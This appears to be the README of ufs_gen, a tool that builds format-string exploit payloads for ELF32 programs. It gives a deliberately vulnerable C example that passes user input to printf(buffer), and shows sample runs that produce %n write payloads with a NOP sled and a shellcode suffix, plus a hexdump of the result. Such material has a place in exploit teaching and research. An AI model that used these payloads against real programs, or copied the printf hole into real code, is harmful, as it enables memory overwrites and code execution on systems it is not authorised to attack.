summaryrefslogtreecommitdiff
path: root/README
blob: d8d33589937a32eb299e75691d48f0f0d33eb2bd (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
ufs_gen
=======

This software allows you to generate a payload which may override an address
with the value of your choice.

The syntax is quite simple:

There are three parameters needed for the program to run correctly.

stackidx: this parameter specifies how many dwords you need to access the
beginning of your buffer (or payload).

override: the address to override

with: the value to inject at the address overriden

This software is intended to work with an ELF32 generated by a typical code.

example:

int function(const char *payload)
{
    char buffer[BUFSIZ];

    strncpy(buffer, payload, sizeof(buffer));
    buffer[sizeof(buffer) - 1] = '\0';

    printf(buffer);

    return 0;
}

The support of ELF64 and other formats is intended but not written yet.
Although the option 'addrsize' might already be used to specify if an address
is not 4 bytes long, there is very few chances that it would work correctly.

The support of printf(payload) directly (i.e. without a temporary buffer) is 
also planned.

We support the option --prefix and --suffix which respectively prepend and
append their argument to the payload.

We also support the option --sfxnops which adds n NOP byte (0x90) between the
payload and the suffix

Example
=======

user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n

user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')"
user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode"  --sfxnops 100 | hexdump -C
NOP bytes are at offset 52 (0x34)
suffix is at offset 152 (0x98)
00000000  44 33 22 11 45 33 22 11  46 33 22 11 47 33 22 11  |D3".E3".F3".G3".|
00000010  25 31 32 30 78 25 34 24  6e 25 32 33 39 78 25 35  |%120x%4$n%239x%5|
00000020  24 6e 25 32 33 39 78 25  36 24 6e 25 32 33 39 78  |$n%239x%6$n%239x|
00000030  25 37 24 6e 90 90 90 90  90 90 90 90 90 90 90 90  |%7$n............|
00000040  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000090  90 90 90 90 90 90 90 90  68 2f 73 68 ff fe 44     |........h/sh..D|
0000009f


License
=======

This software is free software covered by the GPL license v2. You should
read the COPYING file to understand what is implied.